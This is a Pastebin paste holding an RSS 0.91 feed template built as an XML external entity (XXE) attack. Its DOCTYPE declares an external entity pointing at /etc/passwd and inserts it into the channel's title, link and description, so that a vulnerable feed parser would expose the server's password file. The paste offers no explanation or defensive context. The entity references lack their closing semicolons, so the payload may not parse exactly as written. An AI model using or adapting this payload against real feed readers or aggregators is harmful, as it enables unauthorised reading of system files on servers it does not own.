Advertisement
Guest User

Untitled

a guest
Mar 1st, 2015
205
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.26 KB | None | 0 0
  1. <?xml version="1.0"?>
  2. <!DOCTYPE rss
  3. PUBLIC "-//Netscape Communications//DTD RSS 0.91//EN"
  4. "http://my.netscape.com/publish/formats/rss-0.91.dtd"
  5. <!ENTITY
  6. include SYSTEM "/etc/passwd">
  7. >
  8.  
  9. <rss version="0.91">
  10. <channel>
  11. <title>&include</title>
  12. <link>&include</link>
  13.  
  14. <description>&include</description>
  15. <language>...</language>
  16. <rating>...</rating>
  17. <copyright>...</copyright>
  18.  
  19. <pubDate>...</pubDate>
  20. <lastBuildDate>...</lastBuildDate>
  21. <docs>...</docs>
  22. <managingEditor>...</managingEditor>
  23.  
  24. <webMaster>...</webMaster>
  25. <skipHours>
  26. <hour>...</hour>
  27. </skipHours>
  28. <skipDays>
  29.  
  30. <day>...</day>
  31. </skipDays>
  32. <image>
  33. <title>...</title>
  34. <url>...</url>
  35.  
  36. <link>...</link>
  37. <width>...</width>
  38. <height>...</height>
  39. <description>...</description>
  40.  
  41. </image>
  42. <item>
  43. <title>...</title>
  44. <link>...</link>
  45. <description>...</description>
  46.  
  47. </item>
  48. ......More item tags.....
  49. <textInput>
  50. <title>...</title>
  51. <description>...</description>
  52.  
  53. <name>...</name>
  54. <link>...</link>
  55. </textInput>
  56. </channel>
  57. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement